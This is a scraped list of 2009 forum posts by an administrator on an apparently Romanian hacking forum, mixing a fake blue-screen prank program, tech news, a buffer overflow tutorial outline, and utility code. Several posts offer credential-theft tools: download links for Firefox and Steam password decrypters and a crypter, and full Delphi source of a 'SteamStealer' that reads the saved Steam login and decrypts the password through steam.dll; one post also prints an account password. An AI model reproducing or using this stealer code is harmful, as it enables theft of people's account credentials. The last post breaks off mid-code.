Nytro (Administrators): 18711 posts, 701 days won
Everything posted by Nytro

  1. The source code was generated automatically by Photoshop (I guess).
  2. Author: Uranium-239

     #include <windows.h>

     /* Full screen width or height, selected by the first character of x */
     #define SCREEN(x) GetSystemMetrics(*x == 'X' ? SM_CXSCREEN : SM_CYSCREEN)

     LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

     char szClassName[ ] = "WindowsApp";

     /* First character of each line is a layout marker: '*' adds a blank line
        before it, '-' does not. The marker itself is never drawn. */
     const char * BSOD_TEXT[] = {
         "-A problem has been detected and Windows has been shut down to prevent damage",
         "-to your computer.",
         "*The problem seems to have been caused by the following file: SPCMDCON.SYS",
         "*PAGE_FAULT_IN_NONPAGED_AREA",
         "*If this is the first time you've seen this Stop error screen,",
         "-restart your computer. If this screen appears again, follow",
         "-these steps:",
         "*Check to make sure any new hardware or software is properly installed.",
         "*If this is a new installation, ask your hardware or software manufacturer",
         "-for any Windows updates you may need",
         "*If problems continue, disable or remove any newly installed hardware",
         "-or software. Disable BIOS memory options such as caching or shadowing.",
         "*If you need to use Safe Mode to remove or disable components, restart",
         "-your computer, press F8 to select Advanced Startup Options, and then",
         "-select Safe Mode.",
         "*Technical Information:",
         "**** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)",
         "**** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c"
     };

     void PRINT_TEXT(HDC hDC){
         unsigned char k = 0;
         unsigned short y_co = 30;
         while(k <= 17){
             if(BSOD_TEXT[k][0] == '*') y_co += 23;
             TextOut(hDC,10,y_co+(k*23),BSOD_TEXT[k]+1,lstrlen(BSOD_TEXT[k])-1);
             k++;
         }
     }

     int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil){
         HWND hwnd;
         MSG messages;
         WNDCLASSEX wincl;

         wincl.hInstance = hThisInstance;
         wincl.lpszClassName = szClassName;
         wincl.lpfnWndProc = WindowProcedure;
         wincl.style = CS_DBLCLKS;
         wincl.cbSize = sizeof (WNDCLASSEX);
         wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
         wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
         wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
         wincl.lpszMenuName = NULL;
         wincl.cbClsExtra = 0;
         wincl.cbWndExtra = 0;
         wincl.hbrBackground = CreateSolidBrush(RGB(0,0,0x77));   /* classic BSOD blue */

         if (!RegisterClassEx (&wincl)) return 0;

         ShowCursor(FALSE);
         /* Borderless popup covering the whole screen */
         hwnd = CreateWindowEx ( 0, szClassName, "BSOD", WS_POPUP, 0, 0, SCREEN("X"), SCREEN("Y"), HWND_DESKTOP, NULL, hThisInstance, NULL );
         ShowWindow (hwnd, nFunsterStil);

         while(GetMessage (&messages, NULL, 0, 0)){
             TranslateMessage(&messages);
             DispatchMessage(&messages);
         }
         return messages.wParam;
     }

     HDC hDC;
     PAINTSTRUCT ps;
     HFONT hFont;

     LRESULT CALLBACK WindowProcedure(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam){
         switch(message){
             case WM_DESTROY:
                 PostQuitMessage(0);
                 break;
             case WM_PAINT:
                 hDC = BeginPaint(hwnd,&ps);
                 hFont = CreateFont( 26, 16, 0, 0,FW_NORMAL, FALSE, FALSE, FALSE, ANSI_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY,DEFAULT_PITCH|FF_ROMAN,"Courier New" );
                 SelectObject(hDC, hFont);
                 SetTextColor(hDC,RGB(0xFF,0xFF,0xFF));
                 SetBkColor(hDC,RGB(0,0,0x77));
                 PRINT_TEXT(hDC);
                 DeleteObject(hFont);
                 EndPaint(hwnd, &ps);
                 break;
             default:
                 return DefWindowProc (hwnd, message, wParam, lParam);
         }
         return 0;
     }

     Screenshot: http://i30.tinypic.com/6qdsmw.jpg
  3. Mozilla Firefox 3.5 Password Decrypter Credits: bl4cksun.org Download: http://www.2shared.com/file/7142545/68574f27/firefox35decrypter.html
  4. Steam® application password decrypter. Credits: bl4cksun.org Download: http://www.2shared.com/file/7142526/a704b91b/steam_password_reader.html
  5. You can also find them here: http://th3-0utl4ws.com/localroot/
  6. Buffer Overflow Basics Video Series!

     In this video series we will learn the basics of Buffer Overflow attacks and demonstrate how one can exploit Buffer Overflows in programs for fun and profit. The pre-requisite for this video series is that you are familiar with Assembly language. If you are not familiar with Assembly language, no worries, I have created detailed video tutorials for Assembly language here - Assembly Language Primer for Hackers.

     1. Smashing the Stack
     In Part 1 of the Buffer Overflow series we will look at why buffer overflow attacks happen. We will discuss how the program stack is laid out when a function call happens, then how a buffer can be overwritten if proper bounds checking does not happen and finally how a hacker could take control of the program by overwriting the return address stored on the stack to an arbitrary value.
     Buffer Overflow Primer Part 1 (Smashing the Stack) Tutorial

     2. Writing Exit Shellcode
     In this video we will look at how to create Shellcode which we can use as payload while exploiting a buffer overflow vulnerability.
     Buffer Overflow Primer Part 2 (Writing Exit Shellcode) Tutorial

     3. Executing Shellcode
     In the last video we saw how to create shellcode from assembly language code; this video will concentrate on how to execute the shellcode from within a C program to check that it is working properly.
     Buffer Overflow Primer Part 3 (Executing Shellcode) Tutorial

     4. Disassembling Execve
     In this video we will look at how to create shellcode for the Execve() syscall. We will first create a C program to spawn a shell using Execve(), then we will disassemble the program to understand how the syscall works and the kind of inputs it expects.
     Buffer Overflow Primer Part 4 (Disassembling Execve) Tutorial

     5. Shellcode for Execve
     In this video we will learn how to convert the shellcode created in the previous video to a more usable format. It is important to note that the shellcode in the previous video cannot be used as-is because it contains NULLs and hardcoded addresses. Thus we need to convert it into something which can be injected into a buffer - i.e. we need to remove the NULLs and set up relative addressing. This video will show how we can replace the NULLs in the shellcode with instructions which results in non-NULL shellcode. Also, we discuss in detail how we can set up relative addressing within the shellcode and modify it at runtime to make it work.
     Buffer Overflow Primer Part 5 (Shellcode for Execve) Tutorial

     6. Exploiting a Program
     In this video we will understand how to use the shellcode created in the previous video to exploit an actual program.
     Buffer Overflow Primer Part 6 (Exploiting a Program) Tutorial

     7. Exploiting a Program Demo
     In this video we will do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c
     Buffer Overflow Primer Part 7 (Exploiting a Program Demo) Tutorial

     8. Return to Libc Theory
     In this video we will look at how to subvert the NX protection mechanism. The NX protection mechanism basically marks the stack, heap etc. as Non-Executable. This means the processor will not execute any instruction which is on them. From a stack overflow standpoint, this is a problem as our entire shellcode is on the stack, which now has been marked "Non-Executable". The way we counter this problem is by using a technique called "Return to Libc".
     Buffer Overflow Primer Part 8 (Return to Libc Theory) Tutorial

     9. Return to Libc Demo
     In this video we will do a hands-on demo of exploiting a stack protected by NX using the Return to Libc exploitation process. We use GDB and attach it to the vulnerable program to find the address of "/bin/bash" in its memory. Once this address is found, we modify Ret2libc.c and launch the attack on the vulnerable program. The successful exploitation leads to spawning of a shell.
     Buffer Overflow Primer Part 9 (Return to Libc Demo) Tutorial

     Thanks,
     Vivek
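     As an added illustration of the Part 1 material (this is example code written for this page, not code from the video series or from Vivek), the C program below models the frame layout the video describes and shows why a missing bounds check lets input reach the saved return address, next to the bounded copy that prevents it. The struct `frame`, the sentinel values and the sample inputs are constructed for the demonstration; the unchecked copy is deliberately stopped at the end of the struct so the program stays well-defined, which a real `strcpy()` would not do.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16

/* Constructed stand-in for a 32-bit x86 stack frame: a fixed-size local
 * buffer followed by the saved frame pointer and the return address, in the
 * order the series describes. Using our own struct keeps the demo
 * well-defined: a real frame is laid out by the compiler, and the overwrite
 * would corrupt control flow instead of a field we can read back. */
struct frame {
    char     buf[BUF_SIZE];
    uint32_t saved_ebp;
    uint32_t ret_addr;
};

#define EBP_SENTINEL 0xBFFFF000u   /* constructed placeholder saved EBP */
#define RET_SENTINEL 0x08048000u   /* constructed placeholder return address */

/* "Before": a byte-by-byte copy with no bounds check, which is what
 * strcpy(f->buf, input) does. It stops at the end of the frame only so the
 * program stays inside its own object; strcpy() itself would keep going. */
static void copy_unchecked(struct frame *f, const char *input) {
    unsigned char *p = (unsigned char *)f;
    size_t i;
    for (i = 0; input[i] != '\0' && i < sizeof *f; i++)
        p[i] = (unsigned char)input[i];
    if (i < sizeof *f)
        p[i] = '\0';
}

/* "After": the bounded copy. Rejects input that would not fit together with
 * its terminating NUL, so buf can never be overrun. 0 = copied, -1 = rejected. */
static int copy_checked(struct frame *f, const char *input) {
    size_t len = strlen(input);
    if (len >= sizeof f->buf)
        return -1;
    memcpy(f->buf, input, len + 1);
    return 0;
}

/* Runs the unchecked copy on a fresh frame and reports the return address
 * afterwards; bytes 21 onwards of the input land in it. */
uint32_t ret_after_unchecked(const char *input) {
    struct frame f = { {0}, EBP_SENTINEL, RET_SENTINEL };
    copy_unchecked(&f, input);
    return f.ret_addr;
}

/* Same experiment with the bounded copy: the return address must come back
 * unchanged whether the input was accepted or rejected. */
uint32_t ret_after_checked(const char *input) {
    struct frame f = { {0}, EBP_SENTINEL, RET_SENTINEL };
    (void)copy_checked(&f, input);
    return f.ret_addr;
}

/* 1 if the bounded copy rejects the input, 0 if it fits. */
int checked_rejects(const char *input) {
    struct frame f = { {0}, EBP_SENTINEL, RET_SENTINEL };
    return copy_checked(&f, input) != 0;
}

int main(void) {
    /* Constructed inputs: one that fits, and 16 'A' + 4 'B' + 4 'C' that
     * fills buf, then saved_ebp, then ret_addr. */
    const char *fits   = "hello";
    const char *spills = "AAAAAAAAAAAAAAAABBBBCCCC";

    printf("unchecked, short input: ret=0x%08x\n",
           (unsigned)ret_after_unchecked(fits));
    printf("unchecked, long input:  ret=0x%08x  (the 'CCCC' bytes)\n",
           (unsigned)ret_after_unchecked(spills));
    printf("checked,   long input:  ret=0x%08x  rejected=%d\n",
           (unsigned)ret_after_checked(spills), checked_rejects(spills));
    return 0;
}
```

     The point to take from running it: with the unchecked copy the 24-byte input replaces the return address with 0x43434343 (the four 'C' bytes), which is exactly the control-flow hijack the video explains; with the length check in place the same input is refused and the return address is untouched, which is why bounds checking (or the compiler's stack protector, NX and ASLR discussed later in the series) is the mitigation.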
  7. Windows 8 is coming in 2012
     by Mina Hutterer | 8 August 2009

     Although Windows 7 will only be launched in October, according to an image apparently "leaked" by Microsoft's Italian subsidiary, the company has already scheduled the launch of Windows 8 for 2012. The authenticity of the image cannot be verified, but a launch estimated three years from now is not at all unrealistic. If the image is authentic, this figure is only an internal Microsoft estimate. Moreover, 2012 is preceded by ~ in the image, which denotes an approximate date. Until Windows 8, Windows 7 will be launched in October this year and, so far, Microsoft has managed to stir up a buzz around the new operating system, which has been fairly well received, especially by users who are reluctant to give up Windows XP.
  8. Windows 7 will have DirectX 11 "graphics"
     by Mina Hutterer | 7 August 2009

     With Windows 7, Microsoft wants to offer an operating system capable of using the system's video hardware efficiently. The company is working closely with NVIDIA and AMD (ATI) to make sure there will be no problems at all between Windows 7 DirectX 11 and the drivers for GeForce and Radeon chipset cards. One of the main advantages of DirectX 11 is, for example, the operating system's ability to play video without loading the CPU, directly through the graphics card. Moreover, an AMD representative states that DirectX 11 will allow a level of realism in games that was impossible until now. AMD plans to launch the first DirectX 11-compatible cards in October 2009, together with the launch of Windows 7. Here are the main features of DirectX 11:
     - Full support (including all DX11 hardware features) on Windows Vista as well as future versions of Windows
     - Compatibility with DirectX 10 and 10.1 hardware, as well as support for new DirectX 11 hardware
     - New compute shader technology that lays the groundwork for the GPU to be used for more than just 3D graphics, so that developers can take advantage of the graphics card as a parallel processor
     - Multi-threaded resource handling that will allow games to better take advantage of multi-core machines
     - Support for tessellation, which blurs the line between super high quality pre-rendered scenes and scenes rendered in real-time, allowing game developers to refine models to be smoother and more attractive when seen up close
  9. Cryptosy Mod By Smokin3000 Download: http://www.2shared.com/file/7135910/43a75220/Cryptosy_Mod_By_Smokin3000.html
  10. '---------------------------------------------------------------------------------------
     ' Module      : mLockedFiles
     ' DateTime    : 11/08/2009 02:10
     ' Author      : SqUeEzEr
     ' Mail        : scott_van_dinter@hotmail.com@hotmail.com
     ' Purpose     : Close filehandles owned by other processes
     ' Usage       : At your own risk
     ' Requirements: None
     ' Distribution: You can freely use this code in your own
     '               applications, but you may not reproduce
     '               or publish this code on any web site,
     '               online service, or distribute as source
     '               on any media without express permission.
     '
     ' Reference   : Deleting locked files
     '               http://www.codeguru.com/cpp/w-p/files/fileio/article.php/c1287
     '
     ' History     : 11/08/2009 First Cut....................................................
     '---------------------------------------------------------------------------------------

     Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
     Private Declare Function NtDuplicateObject Lib "NTDLL.DLL" (ByVal hSourceProcess As Long, ByVal hSourceHandle As Long, ByVal hCopyProcess As Long, CopyHandle As Long, ByVal DesiredAccess As Long, ByVal Attributes As Long, ByVal Options As Long) As Long
     Private Declare Function NtClose Lib "NTDLL.DLL" (ByVal ObjectHandle As Long) As Long
     Public Declare Function CreateToolhelp32Snapshot Lib "Kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
     Public Declare Function Process32First Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
     Public Declare Function Process32Next Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
     Public Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long
     Public Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
     Public Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long

     Public Type PROCESSENTRY32
         dwSize As Long
         cntUsage As Long
         th32ProcessID As Long           ' Identifier of the process
         th32DefaultHeapID As Long
         th32ModuleID As Long
         cntThreads As Long
         th32ParentProcessID As Long
         pcPriClassBase As Long
         dwFlags As Long
         szExeFile As String * 260
     End Type

     Private Const FILE_FLAG_BACKUP_SEMANTICS As Long = &H2000000
     Private Const GENERIC_ALL As Long = &H10000000
     Private Const FILE_SHARE_READ As Long = &H1&
     Private Const FILE_SHARE_WRITE As Long = &H2&
     Private Const OPEN_EXISTING As Long = 3&
     Private Const DUPLICATE_CLOSE_SOURCE = &H1
     Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
     Public Const TH32CS_SNAPPROCESS As Long = &H2

     Public Function Closehandles(sFileName As String) As Boolean
         Dim hFile As Long
         Dim pInfo As PROCESSENTRY32
         Dim hSnapshot As Long
         Dim lSuccess As Long
         Dim lRet As Long
         Dim hProcess As Long

         ' Privilege 20 = SeDebugPrivilege, needed to open other processes with full access
         Call RtlAdjustPrivilege(20, True, True, 0)

         ' Share flags are a bitmask, so they must be combined with Or
         ' (the original used And, which yields 0 = no sharing at all)
         hFile = CreateFile(sFileName, GENERIC_ALL, FILE_SHARE_WRITE Or FILE_SHARE_READ, 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, 0&)

         hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
         If hSnapshot = -1 Then
             Debug.Print "Unable to take snapshot of process list!"
         Else
             pInfo.dwSize = Len(pInfo)
             lSuccess = Process32First(hSnapshot, pInfo)
             Do While lSuccess <> 0
                 hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pInfo.th32ProcessID)
                 ' DUPLICATE_CLOSE_SOURCE closes the source handle in the target process
                 Call NtDuplicateObject(hProcess, hFile, 0, ByVal 0, 0, 0, DUPLICATE_CLOSE_SOURCE)
                 Call NtClose(hProcess)
                 pInfo.dwSize = Len(pInfo)
                 lSuccess = Process32Next(hSnapshot, pInfo)
             Loop
             lRet = CloseHandle(hSnapshot)
         End If
         Closehandles = True
     End Function

     Usage:

     If Closehandles("C:\file.txt") Then Kill "C:\file.txt"
  11. While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utilise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures: if you trust the source of the component then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well, that’s how the sandbox works in theory at least. In other words, you had better trust the authors of the ActiveX component. In this paper, I won’t be focusing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user’s computer simply by guiding them to a malicious web site. In other words, no actions on the part of the user are required for remote code execution. The paper (by shape) can be viewed here: http://blog.sat0ri.com/wp-content/uploads/2009/08/Identifying-Vulnerabilities-in-ActiveX-Controls.pdf
  12. Done, I understood how things stand and I think we've made peace too.
  13. Out of curiosity, who's the retard copying from this forum?
  14. Yes, and the replies look familiar to me. A child with no future. PS: Who the hell is posting with my account? User: Nytro Pass: adminxxx
  15. White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/ White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/ White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/
  16. by -bRx-

     Function UltimoNickUsadoInGame:String; = latest nick in game
     Function UserCounterStrikeRate:String; = latest rate set by user
     Function DiretorioDaSteam:String; = steam directory
     Function DiretorioDoExecutavelSteam:String; = exe steam dir
     Function ConfiguracaoDeIdioma:String; = language
     Function EnviarDadosSTEAM:String; all results in this function

     {*********************************************************************************************
     *-----------=*@@=------------------*@@*.----------------------------------------------------*
     *----------.@@@@@@@%-.-------------@@@@@@@#=------------- ::--------@#-.--------------------*
     *-----------=@@@*-@@@@@@@@#:---------@@@@#@@@@@#+: -----@@@@#------@@@@=--------------------*
     *------------#@@@----- :-%@@@@--------@@@=---#%@@@@-- =@@@@@@@:---#@@@+---------------------*
     *- .:- ---@@@#-------:@@@%---------+@@*----*@@@%@@@@@@@*@@@%-+@@@*------- .:-:------*
     *@@@@@@@@@=----@@@ ----*@@@@%#@@@@@@@@#:#@@#:@@@@@@@#-@@@%-- @@@@@@@--------@@@@@@@@@@------*
     *#%%@@@#*------=@@%--@@@@@@@@@@@%#%@@@@@@@@@@@@@@+.--*@@*----- @@@@@ -------*%@%@@%#+-------*
     *---------------@@@@@@@@@#-.---------=@@@@@@@@.-----#@@*------=@@@@@@@.---------------------*
     *-------------+@@@@@%: ---------------@@@@+@@@------@@@------*@@@: @@@@#--------------------*
     *------------.#+.@@@*-----------------@@@@-=@@%----@@@------+@@@-----@@@@+------------------*
     *----------------=@@@----------------%@@@ --#=.---+@@+------@@@+------#@@@@.----------------*
     *----------------.@@@--------------*@@@@----------@@@-----:@@@#-------- @@@@#---------------*
     *-----------------#- --------- -%@@@@%:-----------@@%------@@@------+#@@@@@@@@+-------------*
     *--------------.-=:.:-=+*%@@@@@@@@#---------------@@%---------------@@@@%*=-:::-------------*
     *--------------- .-=**%%%%#*+:.-------------------@@@----------------- ---------------------*
     *-------------------------------------------------.@@ --------------------------------------*
     *********************************************************************************************
     Author: counterstrikewi and -bRx-
     please give credits in case of use }

     unit SteamStealerUnitBybRx;

     interface

     uses
       Windows, CompressionStreamUnit;

     type
       LongRec = packed record
         case Integer of
           0: (Lo, Hi: Word);
           1: (Words: array [0..1] of Word);
           2: (Bytes: array [0..3] of Byte);
       end;

       { TStringStream }
       TStringStream = class(TStream)
       private
         FDataString: string;
         FPosition: Integer;
       protected
         procedure SetSize(NewSize: Longint); override;
       public
         constructor Create(const AString: string);
         function Read(var Buffer; Count: Longint): Longint; override;
         function ReadString(Count: Longint): string;
         function Seek(Offset: Longint; Origin: Word): Longint; override;
         function Write(const Buffer; Count: Longint): Longint; override;
         procedure WriteString(const AString: string);
         property DataString: string read FDataString;
       end;

     const
       { File open modes }
     {$IFDEF LINUX}
       fmOpenRead = O_RDONLY;
       fmOpenWrite = O_WRONLY;
       fmOpenReadWrite = O_RDWR;
       // fmShareCompat not supported
       fmShareExclusive = $0010;
       fmShareDenyWrite = $0020;
       // fmShareDenyRead not supported
       fmShareDenyNone = $0030;
     {$ENDIF}
     {$IFDEF MSWINDOWS}
       fmOpenRead = $0000;
       fmOpenWrite = $0001;
       fmOpenReadWrite = $0002;
       fmShareCompat = $0000 platform; // DOS compatibility mode is not portable
       fmShareExclusive = $0010;
       fmShareDenyWrite = $0020;
       fmShareDenyRead = $0030 platform; // write-only not supported on all platforms
       fmShareDenyNone = $0040;
     {$ENDIF}

     function SteamUserName : String;
     function SteamPassword : String;
     Function UltimoNickUsadoInGame:string;
     Function UserCounterStrikeRate:string;
     Function DiretorioDaSteam:string;
     Function DiretorioDoExecutavelSteam:string;
     Function ConfiguracaoDeIdioma:string;
     Function EnviarDadosSTEAM:string;

     type
       TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl;

     var
       SteamPath : String;
       StringStream : TStringStream;
       FileStream : TFileStream;
       I : Integer;
       UserName : PChar;
       EncryptedPassword : PChar;
       DecryptionKey : TSteamDecryptDataForThisMachine;
       PasswordLength : UINT;
       Password : array[0..99] of char;

     implementation

     function PegaValor( const Key: HKEY; const Chave, Valor: String ) : String;
     var
       handle : HKEY;
       Tipo, Tam : Cardinal;
       Buffer : String;
     begin
       RegOpenKeyEx( Key, PChar( Chave ),0, KEY_ALL_ACCESS, handle );
       Tipo := REG_NONE;
       RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,nil,@Tam );
       SetString(Buffer, nil, Tam);
       RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,PByte(PChar(Buffer)),@Tam );
       Result := PChar(Buffer);
       RegCloseKey( handle );
       Result := PChar(Buffer);
     end;

     procedure FreeAndNil(var Obj);
     var
       Temp: TObject;
     begin
       Temp := TObject(Obj);
       Pointer(Obj) := nil;
       Temp.Free;
     end;

     { TStringStream }

     constructor TStringStream.Create(const AString: string);
     begin
       inherited Create;
       FDataString := AString;
     end;

     function TStringStream.Read(var Buffer; Count: Longint): Longint;
     begin
       Result := Length(FDataString) - FPosition;
       if Result > Count then Result := Count;
       Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result);
       Inc(FPosition, Result);
     end;

     function TStringStream.Write(const Buffer; Count: Longint): Longint;
     begin
       Result := Count;
       SetLength(FDataString, (FPosition + Result));
       Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result);
       Inc(FPosition, Result);
     end;

     function TStringStream.Seek(Offset: Longint; Origin: Word): Longint;
     begin
       case Origin of
         soFromBeginning: FPosition := Offset;
         soFromCurrent: FPosition := FPosition + Offset;
         soFromEnd: FPosition := Length(FDataString) - Offset;
       end;
       if FPosition > Length(FDataString) then
         FPosition := Length(FDataString)
       else if FPosition < 0 then
         FPosition := 0;
       Result := FPosition;
     end;

     function TStringStream.ReadString(Count: Longint): string;
     var
       Len: Integer;
     begin
       Len := Length(FDataString) - FPosition;
       if Len > Count then Len := Count;
       SetString(Result, PChar(@FDataString[FPosition + 1]), Len);
       Inc(FPosition, Len);
     end;

     procedure TStringStream.WriteString(const AString: string);
     begin
       Write(PChar(AString)^, Length(AString));
     end;

     procedure TStringStream.SetSize(NewSize: Longint);
     begin
       SetLength(FDataString, NewSize);
       if FPosition > NewSize then FPosition := NewSize;
     end;

     function StrLen(const Str: PChar): Cardinal; assembler;
     asm
       MOV EDX,EDI
       MOV EDI,EAX
       MOV ECX,0FFFFFFFFH
       XOR AL,AL
       REPNE SCASB
       MOV EAX,0FFFFFFFEH
       SUB EAX,ECX
       MOV EDI,EDX
     end;

     function FileAge(const FileName: string): Integer;
     {$IFDEF MSWINDOWS}
     var
       Handle: THandle;
       FindData: TWin32FindData;
       LocalFileTime: TFileTime;
     begin
       Handle := FindFirstFile(PChar(FileName), FindData);
       if Handle <> INVALID_HANDLE_VALUE then
       begin
         Windows.FindClose(Handle);
         if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
         begin
           FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
           if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit;
         end;
       end;
       Result := -1;
     end;
     {$ENDIF}
     {$IFDEF LINUX}
     var
       st: TStatBuf;
     begin
       if stat(PChar(FileName), st) = 0 then
         Result := st.st_mtime
       else
         Result := -1;
     end;
     {$ENDIF}

     function FileExists(const FileName: string): Boolean;
     {$IFDEF MSWINDOWS}
     begin
       Result := FileAge(FileName) <> -1;
     end;
     {$ENDIF}
     {$IFDEF LINUX}
     begin
       Result := euidaccess(PChar(FileName), F_OK) = 0;
     end;
     {$ENDIF}

     // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password');

     function SteamUserName : String;
     begin
       try
         SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath');
         //Locates UserName within the SteamAppData.vdf file
         FileStream := TFileStream.Create(SteamPath+'\config\SteamAppData.vdf',fmOpenRead);
         StringStream := TStringStream.Create('');
         StringStream.CopyFrom(FileStream, FileStream.Size);
         FreeandNil(FileStream);
         I := Pos('AutoLoginUser',StringStream.DataString);
         I := I + 17;
         UserName := PChar(copy(StringStream.DataString,I,Pos('"',copy(StringStream.DataString,I,100))-1));
         FreeandNil(StringStream);
         Result := UserName;
       except
         Result := 'Error';
       end;
     end;

     function SteamPassword : String;
     begin
       try
         SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath');
         //Locates Encrypted Password within the ClientRegistry.blob file
         if not FileExists(SteamPath+'/ClientRegistry.Blob') then
         begin
           Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.';
           Exit;
         end
         else
         begin
           FileStream := TFileStream.Create(SteamPath+'\ClientRegistry.blob',fmOpenRead);
           StringStream := TStringStream.Create('');
           StringStream.CopyFrom(FileStream, FileStream.Size);
           FreeandNil(FileStream);
           I := Pos('Phrase',StringStream.DataString);
           I := I + 40;
           EncryptedPassword := PChar(copy(StringStream.DataString,I,255));
           FreeandNil(StringStream);
           //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password
           DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath+'\steam.dll')),'SteamDecryptDataForThisMachine');
           DecryptionKey(EncryptedPassword, strlen(EncryptedPassword),@Password, 100,@PasswordLength);
           Result := Password;
         end;
       except
         Result := 'Error';
       end;
     end;

     Function UltimoNickUsadoInGame:string;
     Begin
       Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','LastGameNameUsed');
     End;

     Function UserCounterStrikeRate:string;
     Begin
       Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Rate');
     End;

     Function DiretorioDaSteam:string;
     Begin
       Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath');
     End;

     Function DiretorioDoExecutavelSteam:string;
     Begin
       Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamExe');
     End;

     Function ConfiguracaoDeIdioma:string;
     Begin
       Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language');
     End;

     Function EncontrouSteam:Boolean;
     var
       VerificaString:string;
     Begin
       Result := False;
       VerificaString := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language');
       if VerificaString<>'' then Result := True else Result := False;
     End;

     Function EnviarDadosSTEAM:string;
     var
       Enter:string;
     Begin
       Enter := #13#10;
       if EncontrouSteam then
       begin
         Result := 'Login: '+SteamUserName + Enter +
                   'Senha: '+SteamPassword + Enter +
                   'Ultimo Nick usado: '+UltimoNickUsadoInGame + Enter +
                   'Rate do Usuário: ' +UserCounterStrikeRate + Enter +
                   'Diretório da Steam: '+DiretorioDaSteam + Enter +
                   'Diretório do Executavel Steam: '+DiretorioDoExecutavelSteam + Enter +
                   'Configuração de Idioma do Usuário: '+ConfiguracaoDeIdioma + Enter ;
       end
       else
         Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo';
     end;

     end.

     Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html
  17. by mjrod5: You can flame me or whatever you want... Here is code I made =) Seems like Delphi doesn't support invoke, only call xP Have fun doing nothing with this

     program InlineASM;

     uses
       Windows;

     var
       _msg: String = 'Inline ASM, Delphi';
       _cpt: String = 'woot!';

     begin
       asm
         //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer;
         push 0           //uType
         push _cpt        //lpCaption
         push _msg        //lpText
         push 0           //hWnd
         call messagebox  //Call the MessageBox API with the params you pushed
         //Delphi Equivalent would be
         //MessageBox(0,PChar(_msg),PChar(_cpt),0);
       end;
     end.
  18. Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

     Private Type OSVERSIONINFO
         OSVersionInfoSize As Long
         MajorVersion As Long
         MinorVersion As Long
         BuildNumber As Long
         PlatformId As Long
         szCSDVersion As String * 128
     End Type

     Private Type OSVERSIONINFOEX
         dwOSVersionInfoSize As Long
         dwMajorVersion As Long
         dwMinorVersion As Long
         dwBuildNumber As Long
